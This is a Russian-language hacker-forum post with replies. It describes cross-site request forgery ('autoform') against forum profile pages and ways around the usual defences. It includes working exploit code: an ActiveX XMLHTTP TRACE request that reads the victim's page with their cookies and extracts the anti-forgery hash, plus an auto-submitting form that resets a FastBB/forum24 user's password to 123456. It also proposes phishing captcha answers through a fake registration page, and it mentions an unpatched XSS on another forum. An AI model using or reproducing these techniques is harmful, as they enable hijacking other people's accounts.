Как известно большинство крупных движков форумов защищаются от автоформ различными способами. в этой теме (так как на статью не тянет))) я преведу примеры одного из способов обхода защиты от таких автоформ но прежде обьяснью что такое автоформа (описание что такое автоформ-уязвмости и способы защиты от них предоставлены для новичков в позновательно-ознакомитеьных целях так что судари не бранитесь )) ......................................................................................... например есть профиль юзера где он может изменить любую нужную информацию в том числе емайл для востановления парля и изменение самого пароля итд. и собвстенно существует запрос для изменения этой инфы пусть примером будет www.site.ru/profile.php?user=zet&[email protected] тоесть отправив такой запрос юзер имея авторизоанные куки(кто сохраняет пароль) пройдя по нему изменит свою инфу так что мешает заманить жертву нна такую страницу например с кодом <img src=www.site.ru/profile.php?user=zet&[email protected]> тоесть жертва замент свой емайл для востановления пароля даже этого не заметив . в принципе эта уязвимость и называется автоформа так вот существуют методы защиты от таких автоформ приведу самые распостранённые примеры 1. капча (картина защиты) тость к запросу прибавляется переменная этой картинки например www.site.ru/profile.php?user=zet&[email protected]&kapcha=g324gj42 тоесть если юзер вводит неправильный код с картинки то запрос отклоняется сервером и собственно сгенерировать эту переменную капчи довольно проблематично 2. это ввод действующего пароля для изменении информации тоесть к запросу добавляется переменная пароля . и незная его пароля мы эту автоформу не создадим 3. При заходе на свой профиль страница генерирует хэш юзера (который собственно с генерировать мы тоже не можем) тоесть к запросу добавляется переменная которая содержится только на страницы жертвы ..................................................................................... так вот собственно сам метод с помощью актив икс мы можем получить содержимое страницы и причом с куками жертвы так как запрос выполняется с клиента Code: <SCRIPT> var x = new ActiveXObject("Microsoft.XMLHTTP"); x.open("rnTRACE","http://yandex.ru/",false); x.setRequestHeader("Max-Forwards","0"); x.send(); alert(x.responseText); </SCRIPT> так вот собственно если выдрать с страницы жертвы эту переменную хэша (на фастбб сужествует защита именно п охэшу) и отправить автоформу на смену пароля то мы поменяем жертве пароль на свой если он зайдёт на эту страницу. ну и собственно сам скрипт на примере фастбб HTML: <SCRIPT> function autoform () { document.newuser.submit(); } </SCRIPT> <BODY onload='autoform()'> <form name=newuser action=http://eeweqw.forum24.ru/ method=POST> <SCRIPT> document.write("<input tupe=text name=parol value="); var x = new ActiveXObject("Microsoft.XMLHTTP"); x.open("rnTRACE","http://eeweqw.forum24.ru/",false); x.setRequestHeader("Max-Forwards","0"); x.send(); red=x.responseText.lastIndexOf("parol"); green=x.responseText.lastIndexOf("modraz"); for (var i = red+7; i < green-2; i++) { zet=x.responseText.charAt(i); document.write(zet); } document.write(">"); </SCRIPT> <INPUT NAME='work' TYPE='hidden' value='32'> <INPUT NAME='razdel' TYPE='hidden' value='zalupa'> <INPUT NAME='newpass' TYPE='hidden' value='123456'> немножко его обьяснь если непротив http://eeweqw.forum24.ru - аткакуемый хост parol и modraz - значения в странице кода с помощью которых находится эта переменная хэша (она находится между ними + там разные символы они в цикле отфильтрованы) zalupa - имя пользователя в форуме. увидеть это имя можно просмотрев профиль юзера-жертвы например http://жертва.forum24.ru/?zalupa значит имя жертвы zalupa ну и так жертва зашедшая на страницу с таким кодом меняет свой дейтсвующий пароль на 123456 Ps актуально только под осликом так как актив икс в других браузерах нету ................................................................................... и ещё мысли по обходу защиты с каптчей. например выдираем src этой каптчи и выводим на страницу картинку с такимже src и дальше добавляем поля регестрации и заманиваем на неё с помощью метода зарегаешся бесплатно дам 7мизнак и темсамым регаясь на этом псевдосайте он вводит цифры с капчи для замены своего пароля и нажав кнопочку "Зарегит" отправляет запрос на смену своего пароля ........................................................................................... а вот форму с вводом действещего пароля(как на форуме античата) я пока непредумал. но небеда пассивную хсс на форуме ещё не прикрыли (пс: привет ponchik это sibon) несудите строго. если что не понятно могу разьяснить если считаете что тема достоина статьи то можете переместить
~X3RiX~ в смысле на статью? согласен)0 поэтому и поместил сюда или в смысле не катит под фаст? напоминаю актуально только под осликом
осталось посчитать у скольких юзеров этот актив икс включен =\ он по-моему для инет-приложений отключен по умолчанию начиная с XPsp2, не говоря уже про отдельные элементы актив икса по редактированию реестра или доступа к файловой системе - они просто не поддерживают удаленный доступ (или заблокированы). максимум что можно сделать - составить страницу с кодом, замаскированным под adobe active x и заставить открыть ее на локалхосте - да и то выплюнется предупреждение о наличии актив икс или предложат установить несуществующий элемент. а про вывод капчи на левый сайт это идея хорошая =) +